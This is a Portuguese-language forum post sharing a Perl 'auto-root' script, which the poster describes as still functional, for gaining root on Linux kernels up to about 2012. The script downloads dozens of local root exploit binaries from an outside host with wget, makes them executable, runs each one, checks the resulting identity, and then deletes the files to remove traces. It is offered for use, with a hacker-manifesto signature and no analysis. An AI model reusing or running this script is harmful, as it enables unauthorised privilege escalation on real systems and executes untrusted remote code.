Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Auto-root em Perl

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Tools Auto-root em Perl

    Estava vagando pelas "interwebs", me deparei com um script perl ainda funcional, parece que esta rotando até 2012.

    Código:
    #!/usr/bin/perl
    
    print "######################################################\n";
    print "# Auto Rooting ******* For Linux #\n";
    print "# Margu Local Root 2011 2012 For Linux #\n";
    print "# Version: 1.0 #\n";
    print "######################################################\n";
    {
    system("uname -a");
    system("wget http://www.oco.cc/root/1-2");
    system("chmod 777 1-2");
    system("./1-2");
    system("id");
    system("wget http://www.oco.cc/root/1-3");
    system("chmod 777 1-3");
    system("./1-3");
    system("id");
    system("wget http://www.oco.cc/root/1-4");
    system("chmod 777 1-4");
    system("./1-4");
    system("id");
    system("wget http://www.oco.cc/root/2");
    system("chmod 777 2");
    system("./2");
    system("id");
    system("wget http://www.oco.cc/root/2-1");
    system("chmod 777 2-1");
    system("./2-1");
    system("id");
    system("wget http://www.oco.cc/root/2-6-32-46-2011");
    system("chmod 777 2-6-32-46-2011");
    system("./2-6-32-46-2011");
    system("id");
    system("wget http://www.oco.cc/root/2-6-37");
    system("chmod 777 2-6-37");
    system("./2-6-37");
    system("id");
    system("wget http://www.oco.cc/root/2.6.18-6-x86-2011");
    system("chmod 777 2.6.18-6-x86-2011");
    system("./2.6.18-6-x86-2011");
    system("id");
    system("wget http://www.oco.cc/root/2.6.18-164-2010");
    system("chmod 777 2.6.18-164-2010");
    system("./2.6.18-164-2010");
    system("id");
    system("wget http://www.oco.cc/root/2.6.18-194");
    system("chmod 777 2.6.18-194");
    system("./2.6.18-194");
    system("id");
    system("wget http://www.oco.cc/root/2.6.18-194.1-2010");
    system("chmod 777 2.6.18-194.1-2010");
    system("./2.6.18-194.1-2010");
    system("id");
    system("wget http://www.oco.cc/root/acid");
    system("chmod 777 acid");
    system("./acid");
    system("id");
    system("wget http://www.oco.cc/root/2.6.18-194.2-2010");
    system("chmod 777 2.6.18-194.2-2010");
    system("./2=2.6.18-194.2-2010");
    system("id");
    system("wget http://www.oco.cc/root/2.6.18-274-2011");
    system("chmod 777 2.6.18-274-2011");
    system("./2.6.18-274-2011");
    system("id");
    system("wget http://www.oco.cc/root/2.6.18-374.12.1.el5-2012");
    system("chmod 777 2.6.18-374.12.1.el5-2012");
    system("./2.6.18-374.12.1.el5-2012");
    system("id");
    system("wget http://www.oco.cc/root/2.6.28-2011");
    system("chmod 777 2.6.28-2011");
    system("./2.6.28-2011");
    system("id");
    system("wget http://www.oco.cc/root/2.6.32-46.1.BHsmp");
    system("chmod 777 2.6.32-46.1.BHsmp");
    system("./2.6.32-46.1.BHsmp");
    system("id");
    system("wget http://www.oco.cc/root/2.6.33");
    system("chmod 777 2.6.33");
    system("./2.6.33");
    system("id");
    system("wget http://www.oco.cc/root/2.6.33-2011");
    system("chmod 777 2.6.33-2011");
    system("./2.6.33-2011");
    system("id");
    system("wget http://www.oco.cc/root/2.6.34-2011Exploit1");
    system("chmod 777 2.6.34-2011Exploit1");
    system("./2.6.34-2011Exploit1");
    system("id");
    system("wget http://www.oco.cc/root/2.6.34-2011Exploit2");
    system("chmod 777 2.6.34-2011Exploit2");
    system("./2.6.34-2011Exploit2");
    system("id");
    system("wget http://www.oco.cc/root/2.6.37");
    system("chmod 777 2.6.37");
    system("./2.6.37");
    system("id");
    system("wget http://www.oco.cc/root/2.6.37-rc2");
    system("chmod 777 2.6.37-rc2");
    system("./2.6.37-rc2");
    system("id");
    system("wget http://www.oco.cc/root/2.34-2011Exploit1");
    system("chmod 777 2.34-2011Exploit1");
    system("./2.34-2011Exploit1");
    system("id");
    system("wget http://www.oco.cc/root/3");
    system("chmod 777 3");
    system("./3");
    system("id");
    system("wget http://www.oco.cc/root/4");
    system("chmod 777 4");
    system("./4");
    system("id");
    system("wget http://www.oco.cc/root/5");
    system("chmod 777 5");
    system("./5");
    system("id");
    system("wget http://www.oco.cc/root/6");
    system("chmod 777 6");
    system("./6");
    system("id");
    system("wget http://www.oco.cc/root/7");
    system("chmod 777 7");
    system("./7");
    system("id");
    system("wget http://www.oco.cc/root/7-2");
    system("chmod 777 7-2");
    system("./7-2");
    system("id");
    system("wget http://www.oco.cc/root/7x");
    system("chmod 777 7x");
    system("./7x");
    system("id");
    system("wget http://www.oco.cc/root/8");
    system("chmod 777 8");
    system("./8");
    system("id");
    system("wget http://www.oco.cc/root/9");
    system("chmod 777 9");
    system("./9");
    system("id");
    system("wget http://www.oco.cc/root/10");
    system("chmod 777 10");
    system("./10");
    system("id");
    system("wget http://www.oco.cc/root/11");
    system("chmod 777 11");
    system("./11");
    system("id");
    system("wget http://www.oco.cc/root/13x");
    system("chmod 777 13x");
    system("./13x");
    system("id");
    system("wget http://www.oco.cc/root/14");
    system("chmod 777 14");
    system("./14");
    system("id");
    system("wget http://www.oco.cc/root/15.sh");
    system("chmod 777 15.sh");
    system("./15.sh");
    system("id");
    system("wget http://www.oco.cc/root/16");
    system("chmod 777 16");
    system("./16");
    system("id");
    system("wget http://www.oco.cc/root/16-1");
    system("chmod 777 16-1");
    system("./16-1");
    system("id");
    system("wget http://www.oco.cc/root/18");
    system("chmod 777 18");
    system("./18");
    system("id");
    system("wget http://www.oco.cc/root/18-5");
    system("chmod 777 18-5");
    system("./18-5");
    system("id");
    system("wget http://www.oco.cc/root/31");
    system("chmod 777 31");
    system("./31");
    system("id");
    system("wget http://www.oco.cc/root/36-rc1");
    system("chmod 777 36-rc1");
    system("./36-rc1");
    system("id");
    system("wget http://www.oco.cc/root/44");
    system("chmod 777 44");
    system("./44");
    system("id");
    system("wget http://www.oco.cc/root/15150");
    system("chmod 777 15150");
    system("./15150");
    system("id");
    system("wget http://www.oco.cc/root/15200");
    system("chmod 777 15200");
    system("./15200");
    system("id");
    system("wget http://www.oco.cc/root/exp1");
    system("chmod 777 exp1");
    system("./exp1");
    system("id");
    system("wget http://www.oco.cc/root/exp2");
    system("chmod 777 exp2");
    system("./exp2");
    system("id");
    system("wget http://www.oco.cc/root/exp3");
    system("chmod 777 exp3");
    system("./exp3");
    system("id");
    system("wget http://www.oco.cc/root/exploit");
    system("chmod 777 exploit");
    system("./exploit");
    system("id");
    system("wget http://www.oco.cc/root/full-nelson");
    system("chmod 777 full-nelson");
    system("./full-nelson");
    system("id");
    system("wget http://www.oco.cc/root/gayros");
    system("chmod 777 gayros");
    system("./gayros");
    system("id");
    system("wget http://www.oco.cc/root/lenis.sh");
    system("chmod 777 lenis.sh");
    system("./lenis.sh");
    system("id");
    system("wget http://www.oco.cc/root/local-root-exploit-gayros");
    system("chmod 777 local-root-exploit-gayros");
    system("./local-root-exploit-gayros");
    system("id");
    system("wget http://www.oco.cc/root/pwnkernel");
    system("chmod 777 pwnkernel");
    system("./pwnkernel");
    system("id");
    system("wget http://www.oco.cc/root/root1");
    system("chmod 777 root1");
    system("./root1");
    system("id");
    system("wget http://www.oco.cc/root/root.py");
    system("chmod 777 root.py");
    system("./root.py");
    system("id");
    system("wget http://www.oco.cc/root/runx");
    system("chmod 777 runx");
    system("./runx");
    system("id");
    system("wget http://www.oco.cc/root/tivoli");
    system("chmod 777 tivoli");
    system("./tivoli");
    system("id");
    system("wget http://www.oco.cc/root/ubuntu");
    system("chmod 777 ubuntu");
    system("./ubuntu");
    system("id");
    system("wget http://www.oco.cc/root/vmsplice-local-root-exploit");
    system("chmod 777 vmsplice-local-root-exploit");
    system("./z1d-2011");
    system("id");
    system("wget http://www.oco.cc/root/z1d-2011");
    system("chmod 777 z1d-2011");
    system("./z1d-2011");
    system("id");
    system("whoami");
    system("rm 1-2");
    system("rm 1-3");
    system("rm 1-4");
    system("rm 2");
    system("rm 2-1");
    system("rm 2-6-32-46-2011");
    system("rm 2-6-37");
    system("rm 2.6.18-6-x86-2011");
    system("rm 2.6.18-164-2010");
    system("rm 2.6.18-194");
    system("rm 2.6.18-194.1-2010");
    system("rm acid");
    system("rm 2.6.18-194.2-2010");
    system("rm 2.6.18-274-2011");
    system("rm 2.6.18-374.12.1.el5-2012");
    system("rm 2.6.28-2011");
    system("rm 2.6.32-46.1.BHsmp");
    system("rm 2.6.33");
    system("rm 2.6.33-2011");
    system("rm 2.6.34-2011Exploit1");
    system("rm 2.6.34-2011Exploit2");
    system("rm 2.6.37");
    system("rm 2.6.37-rc2");
    system("rm 2.34-2011Exploit1");
    system("rm 3");
    system("rm 4");
    system("rm 5");
    system("rm 6");
    system("rm 7");
    system("rm 7-2");
    system("rm 7x");
    system("rm 8");
    system("rm 9");
    system("rm 10");
    system("rm 11");
    system("rm 13x");
    system("rm 14");
    system("rm 15.sh");
    system("rm 16");
    system("rm 16-1");
    system("rm 18");
    system("rm 18-5");
    system("rm 31");
    system("rm 36-rc1");
    system("rm 44");
    system("rm 15150");
    system("rm 15200");
    system("rm exp1");
    system("rm exp2");
    system("rm exp3");
    system("rm exploit");
    system("rm full-nelson");
    system("rm gayros");
    system("rm lenis.sh");
    system("rm local-root-exploit-gayros");
    system("rm pwnkernel");
    system("rm root1");
    system("rm root.py");
    system("rm runx");
    system("rm tivoli");
    system("rm ubuntu");
    system("rm vmsplice-local-root-exploit");
    system("rm z1d-2011");
    system("rm exploit.conf");
    system("rm a.c");
    print "######################################################\n";
    print "# Auto Rooting ******* For Linux #\n";
    print "# Margu Local Root 2011 2012 For Linux #\n";
    print "# Version: 1.0 #\n";
    print "######################################################\n";
    print "                     :) \n";
    }
    Buh bye.
    Yes, I am a criminal. My crime is that of curiosity. My crime is
    that of judging people by what they say and think, not what they look like.
    My crime is that of outsmarting you, something that you will never forgive me
    for.

    I am a hacker, and this is my manifesto. You may stop this individual,
    but you can't stop us all... after all, we're all alike.
X
Working...
X